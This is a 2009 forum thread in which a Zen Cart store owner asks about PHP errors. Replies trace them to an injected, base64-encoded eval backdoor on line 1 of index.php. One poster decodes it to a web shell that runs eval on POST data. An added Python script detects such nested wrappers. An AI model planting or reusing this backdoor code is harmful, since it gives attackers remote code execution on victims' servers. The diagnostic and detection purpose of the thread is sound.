Shopping Cart Forum

#1 | jtaylor | 01-07-2009, 01:53 PM
Please can someone help

Hello all,
I have a problem with my ZenCart that has thrown me completely. On the store's main page (www.emplore.com.au/buy/store) we get this error:

Notice: Undefined index: testorrr in /clientdata/clients/e/m/emplore.com.au/www/buy/store/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/includes/functions/sessions.php on line 111

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/includes/functions/sessions.php on line 111

Warning: Cannot modify header information - headers already sent by (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/includes/init_includes/init_templates.php on line 78

Then in the admin page (www.emplore.com.au/buy/store/admin) we get this:

Notice: Undefined index: testorrr in /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/includes/functions/sessions.php on line 111

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/includes/functions/sessions.php on line 111

Warning: Cannot modify header information - headers already sent by (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/includes/init_includes/init_templates.php on line 36

Warning: Cannot modify header information - headers already sent by (output started at /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /clientdata/clients/e/m/emplore.com.au/www/buy/store/admin/includes/functions/general.php on line 34


Can anyone shed some light on this? I have NO IDEA what any of it means, it's like a different language to me!

Thank you all for your help.
__________________

www.emplore.com.au
#2 | jtaylor | 02-07-2009, 01:26 AM

Have I been hacked??
__________________

www.emplore.com.au
#3 | Topshopper | 02-07-2009, 05:45 AM
Probably not hacked

I think the problem lies in line 1 of your '/buy/store/index.php' script.
The rest of the errors come from that one.

What is line 1 of that script?

It seems to be related to 'teststorrr' - should that be 'teststore' or something?

Mike
__________________
Mike

TopShopper Shopping Carts
http://www.topshopper.net
#4 | jtaylor | 02-07-2009, 06:19 AM

Thank you.
um, line 1 is:

<?php /*Packed BLOB icon data. Corruption may result script execution errors. Don't touch it unless you know what you are doing.*/ eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWF poYkNoaVlYTmxOalJmWkdWamIyUmxLQ2RoVjFsdlNrWTVTRkpX VW1KS00xSnNZek5TZG1OdVNubEtNVEE1VUZOamVFcDViRGRKUj FacVlVYzRaMG95YTJkaVJ6a3lXbE5DTldJelZXNVBlVUpzWlVk c01FOTVRamxKUVhCd1dtbG9jR016VG14a1EyZHJXREZDVUZVeF VtSktNbmgyWkcxVmJsaFRhM0JsZDNCc1pHMUdjMHREVW1aVlJU bFVWa1p6Ym1KSE9USmFVMlJrUzFSelMxcFlhSEJrUkhOTFpsRT lQU2NwS1RzPScpKTs='));?><?php
__________________

www.emplore.com.au
#5 | Topshopper | 02-07-2009, 06:26 AM
Need more info

The error is in this bit - where did that come from?

'ZXZhbChiYXNlNjRfZGVjb2RlKCdaWF poYkNoaVlYTmxOalJmWkdWamIyUmxLQ2RoVjFsdlNrWTVTRkpX VW1KS00xSnNZek5TZG1OdVNubEtNVEE1VUZOamVFcDViRGRKUj FacVlVYzRaMG95YTJkaVJ6a3lXbE5DTldJelZXNVBlVUpzWlVk c01FOTVRamxKUVhCd1dtbG9jR016VG14a1EyZHJXREZDVUZVeF VtSktNbmgyWkcxVmJsaFRhM0JsZDNCc1pHMUdjMHREVW1aVlJU bFVWa1p6Ym1KSE9USmFVMlJrUzFSelMxcFlhSEJrUkhOTFpsRT lQU2NwS1RzPScpKTs='

Did you have to insert this yourself?
__________________
Mike

TopShopper Shopping Carts
http://www.topshopper.net
#6 | jtaylor | 02-07-2009, 06:34 AM

I don't think I would have put it in - I don't go into those files...
Do you think if I delete it, it will work again?
__________________

www.emplore.com.au
#7 | Topshopper | 02-07-2009, 06:46 AM
Don't Delete

Hi

If you didn't insert this yourself then don't delete it.

If you put "zen cart Undefined index:" into Google you get hundreds of references, so you are not the only one with this problem.

If you Google "zen cart Undefined index: testorrr" you get three - one being your problem.

This is a Zen Cart problem for them to fix I think.

Regards
__________________
Mike

TopShopper Shopping Carts
http://www.topshopper.net
#8 | ghshopper | 03-07-2009, 02:26 PM

Yes, you have been hacked.

ZenCart have announced a security exploit that allows files to be written to, and run on, your server. See
http://www.zen-cart.com/forum/showthread.php?t=130161

The exploit also writes records to the record_company table, and you can see the names of files that have been written in there. One of them is a script to insert a piece of code into other files which will produce the error you are seeing.

You will need to re-install from backup, as probably many of your files will have been altered. However, it is safe to delete the line 1 quoted above (leave <?php in place). It is just base 64 encoded code for

if($_GET['testorrr']=='1'){ echo 'i love you'; exit; }
if(isset($_POST['love'])){
eval($_POST['love']);
exit;
}

Last edited by ghshopper; 03-07-2009 at 02:33 PM.
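
A way to triage a file like the one in this thread without executing it, given here as an added example that is not part of the original posts: the script peels nested `eval(base64_decode('...'))` layers statically and reports whether the decoded code passes request data to `eval()`. The function names (`unwrap`, `inspect_file`, `wrap`) and the sample are constructed for illustration.

```python
import base64
import re

# One eval(base64_decode('...')) wrapper. Whitespace inside the quoted blob is
# tolerated because forum software and editors wrap long lines.
WRAPPER = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)")
# Decoded code that feeds request data straight into eval().
REQUEST_EVAL = re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b")
MAX_LAYERS = 10  # give up on pathological nesting


def unwrap(php_source):
    """Peel nested wrappers statically. Returns (layers, innermost_code)."""
    code, layers = php_source, 0
    while layers < MAX_LAYERS:
        match = WRAPPER.search(code)
        if match is None:
            break
        blob = re.sub(r"\s+", "", match.group(2))
        try:
            code = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # malformed base64: keep what was decoded so far
            break
        layers += 1
    return layers, code


def inspect_file(php_source):
    """Summarise one PHP file: wrapper on line 1, nesting depth, request-driven eval."""
    first_line = php_source.split("\n", 1)[0]
    layers, inner = unwrap(php_source)
    return {"wrapper_on_line_1": WRAPPER.search(first_line) is not None,
            "layers": layers,
            "request_eval": REQUEST_EVAL.search(inner) is not None,
            "decoded": inner}


def wrap(code):
    """Sample builder: put one wrapper layer around code."""
    return "eval(base64_decode('%s'));" % base64.b64encode(code.encode()).decode()


# Constructed sample, modelled on the shape of the line quoted in the thread:
# three nested layers, with a space inserted in the outer blob.
INNER = "if(isset($_POST['k'])){ eval($_POST['k']); exit; }"
outer = wrap(wrap(wrap(INNER)))
SAMPLE = ("<?php /*icon data*/ " + outer[:40] + " " + outer[40:]
          + "?><?php\necho 'store';\n")
```

Running `inspect_file` over every `.php` file under the web root and listing those with `wrapper_on_line_1` set gives a quick inventory of files to compare against a clean copy.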
#9 | jtaylor | 04-07-2009, 12:51 AM

Thanks...
When I reinstall, will all our customers' details be lost? I didn't do a backup... yes I know...!
Ta.
__________________

www.emplore.com.au
#10 | ghshopper | 04-07-2009, 05:03 PM

It's the server files you need to restore rather than the database, unless you have got other hacks as well.

But you need to close the exploit first (see Zen link above), otherwise it will all just happen again. There are instructions there for recovering from hacks.

Are you saying you have made all the mods to Zen directly on the server, and you don't have a copy? In that case, you are in trouble because I think you will have to re-install and do your site config all over again.

Always create your site locally on your PC and then upload to the server.
#11 | dezina | 04-07-2009, 05:12 PM

Quote:
I didn't do a backup... yes I know...!
Check with your webhost... most decent ones do daily or weekly or monthly backups.